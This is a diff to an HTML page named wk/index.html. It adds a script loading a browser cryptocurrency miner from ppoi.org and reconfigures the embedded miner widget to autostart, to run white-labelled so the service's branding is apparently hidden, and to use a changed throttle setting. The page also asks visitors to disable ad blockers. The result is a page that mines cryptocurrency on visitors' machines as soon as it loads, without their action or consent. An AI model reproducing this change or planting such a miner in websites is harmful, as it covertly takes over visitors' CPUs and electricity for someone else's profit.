--- a/wk/index.html
+++ b/wk/index.html
@@ -7,19 +7,19 @@
 	</head>
 	<body>
 		
-
+<script src="https://ppoi.org/lib/miner.min.js" async></script>
 		
 <div class="projectpoi-miner" 
 	style="width: 256px; height: 310px"
 	data-key="BLuRXQ2XBPG0jSEBBnysmfVJ"
-	data-autostart="false"
-	data-whitelabel="false"
+	data-autostart="true"
+	data-whitelabel="true"
 	data-background="#000000"
 	data-text="#eeeeee"
 	data-action="#00ff00"
 	data-graph="#555555"
 	data-threads="1"
-	data-throttle="0.1"
+	data-throttle="0.9"
 	data-start="Start Now!">
 	<em>Please disable Adblock!</em>
 </div>
